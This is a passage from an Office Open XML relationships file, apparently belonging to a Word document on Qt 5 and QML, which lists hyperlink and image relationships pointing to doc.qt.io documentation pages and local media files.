Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-stenciltestarguments.html" TargetMode="External"/><Relationship Id="rId1776" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-stacklayout.html" TargetMode="External"/><Relationship Id="rId1983" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2827" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterialtype.html" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-date.html" TargetMode="External"/><Relationship Id="rId1429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-vector3danimation.html" TargetMode="External"/><Relationship Id="rId1636" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-gridview.html" TargetMode="External"/><Relationship Id="rId1843" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-shadereffect.html" TargetMode="External"/><Relationship Id="rId1703" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/rowlayout-minimum.png" TargetMode="External"/><Relationship Id="rId1910" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-imports.html" TargetMode="External"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textedit.html" TargetMode="External"/><Relationship Id="rId2172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId3016" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-index.html" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-blend.html" TargetMode="External"/><Relationship Id="rId796" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-canvas.html" TargetMode="External"/><Relationship Id="rId2477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-animation-example.html" TargetMode="External"/><Relationship Id="rId2684" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-definetypes.html" TargetMode="External"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/09-qdoc-commands-includingimages.html" TargetMode="External"/><Relationship Id="rId656" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-shadereffect.html" TargetMode="External"/><Relationship Id="rId863" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-cuboidmesh.html" TargetMode="External"/><Relationship Id="rId1079" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-matrix4x4.html" TargetMode="External"/><Relationship Id="rId1286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-signalspy.html" TargetMode="External"/><Relationship Id="rId1493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-topic.html" TargetMode="External"/><Relationship Id="rId2032" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickpainteditem.html" TargetMode="External"/><Relationship Id="rId2337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/anchor_ordering.png" TargetMode="External"/><Relationship Id="rId2544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtwidgets-animation-easing-example.html" TargetMode="External"/><Relationship Id="rId2891" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmetaproperty.html" TargetMode="External"/><Relationship Id="rId2989" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/audiooverview.html" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-resources.html" TargetMode="External"/><Relationship Id="rId516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-patharc.html" TargetMode="External"/><Relationship Id="rId1798" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-window.html" TargetMode="External"/><Relationship Id="rId2751" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId2849" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickasyncimageprovider.html" TargetMode="External"/><Relationship Id="rId723" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-anchoranimation.html" TargetMode="External"/><Relationship Id="rId930" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-focusscope.html" TargetMode="External"/><Relationship Id="rId1006" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-irproximitysensor.html" TargetMode="External"/><Relationship Id="rId1353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-tableviewstyle.html" TargetMode="External"/><Relationship Id="rId1560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1658" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtsql-attribution-sqlite.html" TargetMode="External"/><Relationship Id="rId1865" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-direction.html" TargetMode="External"/><Relationship Id="rId2404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-yanimator.html" TargetMode="External"/><Relationship Id="rId2611" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcontext.html" TargetMode="External"/><Relationship Id="rId2709" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId1213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-radialblur.html" TargetMode="External"/><Relationship Id="rId1420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-valueaxis3d.html" TargetMode="External"/><Relationship Id="rId1518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2916" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-interactqmlfromcpp.html" TargetMode="External"/><Relationship Id="rId1725" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1932" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qttest-qmlmodule.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-trailemitter.html" TargetMode="External"/><Relationship Id="rId2054" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-keyinteraction-example.html" TargetMode="External"/><Relationship Id="rId2499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertyaction.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId678" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-date.html" TargetMode="External"/><Relationship Id="rId885" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-dialog.html" TargetMode="External"/><Relationship Id="rId1070" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-mapquickitem.html" TargetMode="External"/><Relationship Id="rId2121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-positioner.html" TargetMode="External"/><Relationship Id="rId2566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId2773" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId2980" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebview-webview.html" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlextensionplugin.html" TargetMode="External"/><Relationship Id="rId538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-button.html" TargetMode="External"/><Relationship Id="rId745" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-axis.html" TargetMode="External"/><Relationship Id="rId952" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-geometry.html" TargetMode="External"/><Relationship Id="rId1168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-pieseries.html" TargetMode="External"/><Relationship Id="rId1375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-theme3d.html" TargetMode="External"/><Relationship Id="rId1582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-cppextensionpoints.html" TargetMode="External"/><Relationship Id="rId2219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-stategroup.html" TargetMode="External"/><Relationship Id="rId2633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/model-view-programming.html" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId605" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-maskedblur.html" TargetMode="External"/><Relationship Id="rId812" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-canvaspixelarray.html" TargetMode="External"/><Relationship Id="rId1028" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-styles-keyboardstyle.html" TargetMode="External"/><Relationship Id="rId1235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-rendersurfaceselector.html" TargetMode="External"/><Relationship Id="rId1442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwayland-compositor-waylandclient.html" TargetMode="External"/><Relationship Id="rId1887" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particle.html" TargetMode="External"/><Relationship Id="rId2840" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgrectanglenode.html" TargetMode="External"/><Relationship Id="rId2938" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmetaobject.html" TargetMode="External"/><Relationship Id="rId1302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-spinboxstyle.html" TargetMode="External"/><Relationship Id="rId1747" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1954" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId2700" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-qmlglobalobject.html" TargetMode="External"/><Relationship Id="rId1607" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-window.html" TargetMode="External"/><Relationship Id="rId1814" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qcoreapplication.html" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-tutorials-extending-qml-example.html" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlscene.html" TargetMode="External"/><Relationship Id="rId2076" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsurfaceformat.html" TargetMode="External"/><Relationship Id="rId2283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qregexp.html" TargetMode="External"/><Relationship Id="rId2490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-sequentialanimation.html" TargetMode="External"/><Relationship Id="rId2588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId1092" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-menuseparator.html" TargetMode="External"/><Relationship Id="rId1397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-touchpoint.html" TargetMode="External"/><Relationship Id="rId2143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpeg"/><Relationship Id="rId2350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2795" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-int.html" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlextensionplugin.html" TargetMode="External"/><Relationship Id="rId767" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-boxplotseries.html" TargetMode="External"/><Relationship Id="rId974" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-handwritingmodekey.html" TargetMode="External"/><Relationship Id="rId2003" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgsimpletexturenode.html" TargetMode="External"/><Relationship Id="rId2210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-behavior.html" TargetMode="External"/><Relationship Id="rId2655" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qlistview.html" TargetMode="External"/><Relationship Id="rId2862" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId627" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qstring.html" TargetMode="External"/><Relationship Id="rId834" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-colorgradient.html" TargetMode="External"/><Relationship Id="rId1257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-scatter3dseries.html" TargetMode="External"/><Relationship Id="rId1464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebview-webview.html" TargetMode="External"/><Relationship Id="rId1671" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquicklayouts-overview.html" TargetMode="External"/><Relationship Id="rId2308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId2722" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId901" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-drag.html" TargetMode="External"/><Relationship Id="rId1117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-nodraw.html" TargetMode="External"/><Relationship Id="rId1324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-statusbarstyle.html" TargetMode="External"/><Relationship Id="rId1531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qt.html" TargetMode="External"/><Relationship Id="rId1769" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-rowlayout.html" TargetMode="External"/><Relationship Id="rId1976" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgclipnode.html" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId1629" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId1836" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlepainter.html" TargetMode="External"/><Relationship Id="rId1903" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2098" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-index.html" TargetMode="External"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-flickable.html" TargetMode="External"/><Relationship Id="rId2165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId3009" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-porting-qt5.html" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-vector3d.html" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-basics.html" TargetMode="External"/><Relationship Id="rId691" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/reference-overview.html" TargetMode="External"/><Relationship Id="rId789" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-camerafocus.html" TargetMode="External"/><Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-inputengine.html" TargetMode="External"/><Relationship Id="rId2025" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId2677" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-binding.html" TargetMode="External"/><Relationship Id="rId2884" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qtquickcontrols-example-gallery-osx.png" TargetMode="External"/><Relationship Id="rId649" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-workerscript.html" TargetMode="External"/><Relationship Id="rId856" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-context2d.html" TargetMode="External"/><Relationship Id="rId1181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-plugin.html" TargetMode="External"/><Relationship Id="rId1279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-shadereffectsource.html" TargetMode="External"/><Relationship Id="rId1486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-animations-example.png" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-scope.html" TargetMode="External"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/scalability.html" TargetMode="External"/><Relationship Id="rId1041" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-legend.html" TargetMode="External"/><Relationship Id="rId1139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-parentchange.html" TargetMode="External"/><Relationship Id="rId1346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-systempalette.html" TargetMode="External"/><Relationship 